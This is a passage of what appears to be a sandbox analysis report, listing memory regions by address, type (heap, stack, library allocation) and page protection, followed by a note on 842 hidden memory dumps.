trusted library allocation
|
page execute and read and write
|
||
|
2473BDDC000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F6104A000
|
heap
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
206902F0000
|
trusted library allocation
|
page read and write
|
||
|
2473BCE0000
|
heap
|
page read and write
|
||
|
16F4A3B8000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
247236B7000
|
trusted library allocation
|
page read and write
|
||
|
247235F0000
|
heap
|
page execute and read and write
|
||
|
247242BF000
|
trusted library allocation
|
page read and write
|
||
|
2D61000
|
trusted library allocation
|
page read and write
|
||
|
16F4A906000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
13211000
|
trusted library allocation
|
page read and write
|
||
|
7FF849159000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
206E980A000
|
heap
|
page read and write
|
||
|
2473BC98000
|
heap
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
24733651000
|
trusted library allocation
|
page read and write
|
||
|
7FF849154000
|
trusted library allocation
|
page read and write
|
||
|
24721CF0000
|
heap
|
page read and write
|
||
|
16F58E16000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
|
16F4A2AC000
|
trusted library allocation
|
page read and write
|
||
|
247249FB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD47000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
127E000
|
stack
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
206E9810000
|
heap
|
page readonly
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
24723510000
|
trusted library allocation
|
page read and write
|
||
|
1433000
|
heap
|
page read and write
|
||
|
16F60B97000
|
heap
|
page read and write
|
||
|
ECC000
|
heap
|
page read and write
|
||
|
24724EC2000
|
trusted library allocation
|
page read and write
|
||
|
7DF4B83B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F6143B000
|
heap
|
page read and write
|
||
|
206E98E7000
|
heap
|
page execute and read and write
|
||
|
24721AF0000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
307F8FE000
|
stack
|
page read and write
|
||
|
13251000
|
trusted library allocation
|
page read and write
|
||
|
7FF84924D000
|
trusted library allocation
|
page read and write
|
||
|
2473BC6F000
|
heap
|
page read and write
|
||
|
307FBF6000
|
stack
|
page read and write
|
||
|
206EA1D9000
|
heap
|
page read and write
|
||
|
7FF849270000
|
trusted library allocation
|
page read and write
|
||
|
20681954000
|
trusted library allocation
|
page read and write
|
||
|
24724813000
|
trusted library allocation
|
page read and write
|
||
|
7FF849220000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849220000
|
trusted library allocation
|
page read and write
|
||
|
16F4A94B000
|
trusted library allocation
|
page read and write
|
||
|
20680D72000
|
trusted library allocation
|
page read and write
|
||
|
1720000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
7FF435A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
16F48B21000
|
trusted library allocation
|
page read and write
|
||
|
EB5000
|
heap
|
page read and write
|
||
|
23295AD0000
|
heap
|
page read and write
|
||
|
307F4B3000
|
stack
|
page read and write
|
||
|
206EA1FF000
|
heap
|
page read and write
|
||
|
945D13E000
|
stack
|
page read and write
|
||
|
24733631000
|
trusted library allocation
|
page read and write
|
||
|
13258000
|
trusted library allocation
|
page read and write
|
||
|
206E9F8C000
|
heap
|
page read and write
|
||
|
9BD617B000
|
stack
|
page read and write
|
||
|
139F000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
16F58E28000
|
trusted library allocation
|
page read and write
|
||
|
1BCC9000
|
heap
|
page read and write
|
||
|
206E9E90000
|
heap
|
page read and write
|
||
|
16F610A3000
|
heap
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
20680229000
|
trusted library allocation
|
page read and write
|
||
|
247339D9000
|
trusted library allocation
|
page read and write
|
||
|
206E9F40000
|
heap
|
page read and write
|
||
|
945DE8E000
|
stack
|
page read and write
|
||
|
206E9F4A000
|
heap
|
page read and write
|
||
|
20680CEB000
|
trusted library allocation
|
page read and write
|
||
|
7FF849102000
|
trusted library allocation
|
page read and write
|
||
|
11A6000
|
heap
|
page read and write
|
||
|
1C1ED000
|
stack
|
page read and write
|
||
|
1BCAB000
|
stack
|
page read and write
|
||
|
2472463E000
|
trusted library allocation
|
page read and write
|
||
|
16F47230000
|
heap
|
page read and write
|
||
|
24723859000
|
trusted library allocation
|
page read and write
|
||
|
307F9FE000
|
stack
|
page read and write
|
||
|
7FF849210000
|
trusted library allocation
|
page execute and read and write
|
||
|
13213000
|
trusted library allocation
|
page read and write
|
||
|
1780000
|
trusted library allocation
|
page read and write
|
||
|
3000A0E000
|
stack
|
page read and write
|
||
|
7FF849200000
|
trusted library allocation
|
page read and write
|
||
|
206E7FB0000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
23295960000
|
heap
|
page read and write
|
||
|
945D1B7000
|
stack
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
16F611F5000
|
heap
|
page read and write
|
||
|
1B8A0000
|
heap
|
page read and write
|
||
|
136A000
|
heap
|
page read and write
|
||
|
206902F6000
|
trusted library allocation
|
page read and write
|
||
|
16F48AA0000
|
trusted library allocation
|
page read and write
|
||
|
1175000
|
heap
|
page read and write
|
||
|
1290000
|
heap
|
page read and write
|
||
|
2473BCBC000
|
heap
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
3221000
|
trusted library allocation
|
page read and write
|
||
|
206E9ED1000
|
heap
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
307FC78000
|
stack
|
page read and write
|
||
|
2068121C000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490C7000
|
trusted library allocation
|
page read and write
|
||
|
15FF000
|
stack
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
|
1366000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
206E7E3B000
|
heap
|
page read and write
|
||
|
206804CD000
|
trusted library allocation
|
page read and write
|
||
|
89F2B7E000
|
stack
|
page read and write
|
||
|
20681E05000
|
trusted library allocation
|
page read and write
|
||
|
16F49BE4000
|
trusted library allocation
|
page read and write
|
||
|
20681E25000
|
trusted library allocation
|
page read and write
|
||
|
7FF849280000
|
trusted library allocation
|
page read and write
|
||
|
7DF41B7B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473BDC0000
|
heap
|
page read and write
|
||
|
125B000
|
heap
|
page read and write
|
||
|
7FF848E32000
|
trusted library allocation
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
1CCF0000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
1CF8F000
|
heap
|
page read and write
|
||
|
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F48A90000
|
heap
|
page readonly
|
||
|
24723620000
|
heap
|
page read and write
|
||
|
20690001000
|
trusted library allocation
|
page read and write
|
||
|
16F49AC0000
|
trusted library allocation
|
page read and write
|
||
|
9BD6DCE000
|
stack
|
page read and write
|
||
|
20690021000
|
trusted library allocation
|
page read and write
|
||
|
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
|
7DF4F6970000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
1435000
|
heap
|
page read and write
|
||
|
247245C9000
|
trusted library allocation
|
page read and write
|
||
|
7FF849149000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
24733927000
|
trusted library allocation
|
page read and write
|
||
|
16F61202000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1397000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
307FEFE000
|
stack
|
page read and write
|
||
|
12F1000
|
stack
|
page read and write
|
||
|
1B9AE000
|
stack
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
1CFA7000
|
heap
|
page read and write
|
||
|
321F000
|
trusted library allocation
|
page read and write
|
||
|
24723AFD000
|
trusted library allocation
|
page read and write
|
||
|
7FF849168000
|
trusted library allocation
|
page read and write
|
||
|
7FF849230000
|
trusted library allocation
|
page read and write
|
||
|
7FF849144000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE4000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
1BC1E000
|
stack
|
page read and write
|
||
|
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
945CBFE000
|
stack
|
page read and write
|
||
|
34D4000
|
trusted library allocation
|
page read and write
|
||
|
1B6A0000
|
heap
|
page execute and read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1C0EE000
|
stack
|
page read and write
|
||
|
2473391E000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE8000
|
trusted library allocation
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
2473BE0D000
|
heap
|
page read and write
|
||
|
24723550000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF84916A000
|
trusted library allocation
|
page read and write
|
||
|
1B3ED000
|
stack
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F61520000
|
trusted library allocation
|
page read and write
|
||
|
1B8A3000
|
heap
|
page read and write
|
||
|
16F58E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
|
16F4A950000
|
trusted library allocation
|
page read and write
|
||
|
2473BE37000
|
heap
|
page read and write
|
||
|
247235E0000
|
heap
|
page read and write
|
||
|
2473BDD4000
|
heap
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
247336A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849226000
|
trusted library allocation
|
page read and write
|
||
|
1BC20000
|
heap
|
page read and write
|
||
|
13253000
|
trusted library allocation
|
page read and write
|
||
|
206E997A000
|
heap
|
page read and write
|
||
|
945CF7F000
|
stack
|
page read and write
|
||
|
7DF4F6960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF84920E000
|
trusted library allocation
|
page read and write
|
||
|
1330000
|
heap
|
page read and write
|
||
|
16F49573000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490E5000
|
trusted library allocation
|
page read and write
|
||
|
24723530000
|
trusted library allocation
|
page read and write
|
||
|
1C5AE000
|
stack
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
206EA090000
|
heap
|
page execute and read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
13D5000
|
heap
|
page read and write
|
||
|
E90000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1215000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
1B893000
|
heap
|
page execute and read and write
|
||
|
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849210000
|
trusted library allocation
|
page read and write
|
||
|
7FF849270000
|
trusted library allocation
|
page read and write
|
||
|
1B7DD000
|
stack
|
page read and write
|
||
|
1CF8D000
|
heap
|
page read and write
|
||
|
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
|
16F49B52000
|
trusted library allocation
|
page read and write
|
||
|
16F470E5000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page execute and read and write
|
||
|
EF6000
|
heap
|
page read and write
|
||
|
206812AF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8491FC000
|
trusted library allocation
|
page read and write
|
||
|
1C9BC000
|
stack
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
23295A60000
|
heap
|
page read and write
|
||
|
206EA15C000
|
heap
|
page read and write
|
||
|
2473BBB7000
|
heap
|
page execute and read and write
|
||
|
9BD5C7E000
|
stack
|
page read and write
|
||
|
24721EB0000
|
heap
|
page read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
24724F8A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
206EA1E1000
|
heap
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F61419000
|
heap
|
page read and write
|
||
|
1310000
|
heap
|
page read and write
|
||
|
16F47020000
|
heap
|
page read and write
|
||
|
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
|
16F48A30000
|
heap
|
page read and write
|
||
|
16F61451000
|
heap
|
page read and write
|
||
|
2473BF0B000
|
heap
|
page read and write
|
||
|
206E9805000
|
heap
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D32A000
|
stack
|
page read and write
|
||
|
206E9EE7000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2472475B000
|
trusted library allocation
|
page read and write
|
||
|
24733661000
|
trusted library allocation
|
page read and write
|
||
|
1BDC0000
|
heap
|
page execute and read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
945E18E000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
206E7E25000
|
heap
|
page read and write
|
||
|
2473BE44000
|
heap
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
7FF849240000
|
trusted library allocation
|
page read and write
|
||
|
14DC000
|
stack
|
page read and write
|
||
|
206E7E21000
|
heap
|
page read and write
|
||
|
7FF8491F3000
|
trusted library allocation
|
page read and write
|
||
|
1D22E000
|
stack
|
page read and write
|
||
|
1395000
|
heap
|
page read and write
|
||
|
206E7E1B000
|
heap
|
page read and write
|
||
|
177E000
|
stack
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
16F4A392000
|
trusted library allocation
|
page read and write
|
||
|
307F979000
|
stack
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
17D0000
|
heap
|
page read and write
|
||
|
206E9EF6000
|
heap
|
page read and write
|
||
|
9BD6C4E000
|
stack
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
7FF84916C000
|
trusted library allocation
|
page read and write
|
||
|
206E9F89000
|
heap
|
page read and write
|
||
|
20690070000
|
trusted library allocation
|
page read and write
|
||
|
206810C2000
|
trusted library allocation
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
945CB7E000
|
stack
|
page read and write
|
||
|
1CFAF000
|
heap
|
page read and write
|
||
|
115E000
|
stack
|
page read and write
|
||
|
17A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
16F48BA8000
|
trusted library allocation
|
page read and write
|
||
|
16F58B90000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
247246F8000
|
trusted library allocation
|
page read and write
|
||
|
307FDFE000
|
stack
|
page read and write
|
||
|
24724DB6000
|
trusted library allocation
|
page read and write
|
||
|
9BD5EFE000
|
stack
|
page read and write
|
||
|
9BD6BCC000
|
stack
|
page read and write
|
||
|
206E7FD5000
|
heap
|
page read and write
|
||
|
24725410000
|
trusted library allocation
|
page read and write
|
||
|
206818F5000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
trusted library allocation
|
page read and write
|
||
|
2473BBC0000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
1BF2E000
|
stack
|
page read and write
|
||
|
7FF848FB1000
|
trusted library allocation
|
page read and write
|
||
|
2D5F000
|
trusted library allocation
|
page read and write
|
||
|
16F612D0000
|
heap
|
page execute and read and write
|
||
|
2473BE02000
|
heap
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B6E0000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F48FEE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
1BD2E000
|
stack
|
page read and write
|
||
|
13A1000
|
heap
|
page read and write
|
||
|
24733919000
|
trusted library allocation
|
page read and write
|
||
|
945D3BE000
|
stack
|
page read and write
|
||
|
2473BFE0000
|
trusted library allocation
|
page read and write
|
||
|
206EA20A000
|
heap
|
page read and write
|
||
|
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2473BDD8000
|
heap
|
page read and write
|
||
|
7FF8491FA000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
|
9BD5DF9000
|
stack
|
page read and write
|
||
|
12E51000
|
trusted library allocation
|
page read and write
|
||
|
206902EE000
|
trusted library allocation
|
page read and write
|
||
|
16A0000
|
trusted library allocation
|
page read and write
|
||
|
9BD607F000
|
stack
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
13C5000
|
heap
|
page read and write
|
||
|
11AC000
|
heap
|
page read and write
|
||
|
20681008000
|
trusted library allocation
|
page read and write
|
||
|
7FF849133000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
16F47068000
|
heap
|
page read and write
|
||
|
1C88F000
|
stack
|
page read and write
|
||
|
1C5FF000
|
stack
|
page read and write
|
||
|
9BD5BFA000
|
stack
|
page read and write
|
||
|
7FF848FE8000
|
trusted library allocation
|
page read and write
|
||
|
16F60B50000
|
trusted library allocation
|
page read and write
|
||
|
2473BF7B000
|
heap
|
page read and write
|
||
|
31AF000
|
stack
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
9BD5D7D000
|
stack
|
page read and write
|
||
|
24723631000
|
trusted library allocation
|
page read and write
|
||
|
142E000
|
heap
|
page read and write
|
||
|
16F470A8000
|
heap
|
page read and write
|
||
|
247235B0000
|
heap
|
page execute and read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
206E97B0000
|
trusted library section
|
page read and write
|
||
|
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2068186C000
|
trusted library allocation
|
page read and write
|
||
|
16F58E0E000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
1228000
|
heap
|
page read and write
|
||
|
24724EF6000
|
trusted library allocation
|
page read and write
|
||
|
16F60B20000
|
trusted library allocation
|
page read and write
|
||
|
24721B20000
|
heap
|
page read and write
|
||
|
7FF849260000
|
trusted library allocation
|
page read and write
|
||
|
24724261000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1670000
|
heap
|
page read and write
|
||
|
120F000
|
heap
|
page read and write
|
||
|
1CEEC000
|
stack
|
page read and write
|
||
|
DA1000
|
stack
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
B61000
|
stack
|
page read and write
|
||
|
7DF4B83A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BD49000
|
heap
|
page read and write
|
||
|
16F61210000
|
heap
|
page read and write
|
||
|
206813CD000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
heap
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
E50000
|
trusted library allocation
|
page read and write
|
||
|
206E7E1F000
|
heap
|
page read and write
|
||
|
2472422F000
|
trusted library allocation
|
page read and write
|
||
|
24721B33000
|
heap
|
page read and write
|
||
|
1193000
|
trusted library allocation
|
page read and write
|
||
|
1B60E000
|
stack
|
page read and write
|
||
|
325C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
7FF849260000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
1AE80000
|
trusted library allocation
|
page read and write
|
||
|
1B890000
|
heap
|
page execute and read and write
|
||
|
1C843000
|
stack
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
13CC000
|
heap
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
2473BE8A000
|
heap
|
page read and write
|
||
|
2473BEA3000
|
heap
|
page read and write
|
||
|
206E9FB0000
|
heap
|
page read and write
|
||
|
2472466A000
|
trusted library allocation
|
page read and write
|
||
|
1B7EE000
|
stack
|
page read and write
|
||
|
2473BF82000
|
heap
|
page read and write
|
||
|
7FF849133000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
|
20681344000
|
trusted library allocation
|
page read and write
|
||
|
24724E9B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
16F61137000
|
heap
|
page execute and read and write
|
||
|
24721ED0000
|
heap
|
page read and write
|
||
|
1330000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
24721BA4000
|
heap
|
page read and write
|
||
|
16F470AA000
|
heap
|
page read and write
|
||
|
1D82D000
|
stack
|
page read and write
|
||
|
16F58E09000
|
trusted library allocation
|
page read and write
|
||
|
1BFEF000
|
stack
|
page read and write
|
||
|
7FF849159000
|
trusted library allocation
|
page read and write
|
||
|
24724F83000
|
trusted library allocation
|
page read and write
|
||
|
3000B8E000
|
stack
|
page read and write
|
||
|
7FF849250000
|
trusted library allocation
|
page read and write
|
||
|
2473BBF0000
|
heap
|
page read and write
|
||
|
9BD5F78000
|
stack
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
16F49E2F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
12DF000
|
stack
|
page read and write
|
||
|
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24721B5E000
|
heap
|
page read and write
|
||
|
20681892000
|
trusted library allocation
|
page read and write
|
||
|
20681034000
|
trusted library allocation
|
page read and write
|
||
|
945CAF3000
|
stack
|
page read and write
|
||
|
206E7E64000
|
heap
|
page read and write
|
||
|
1B1DF000
|
heap
|
page read and write
|
||
|
307FAFD000
|
stack
|
page read and write
|
||
|
1355000
|
heap
|
page read and write
|
||
|
9BD6CC9000
|
stack
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
ECA000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
20690308000
|
trusted library allocation
|
page read and write
|
||
|
24721AE0000
|
heap
|
page read and write
|
||
|
206E7DA0000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
24724942000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
9BD5B7E000
|
stack
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
9BD5A7E000
|
stack
|
page read and write
|
||
|
2473BF70000
|
heap
|
page read and write
|
There are 842 hidden memdumps, click here to show them.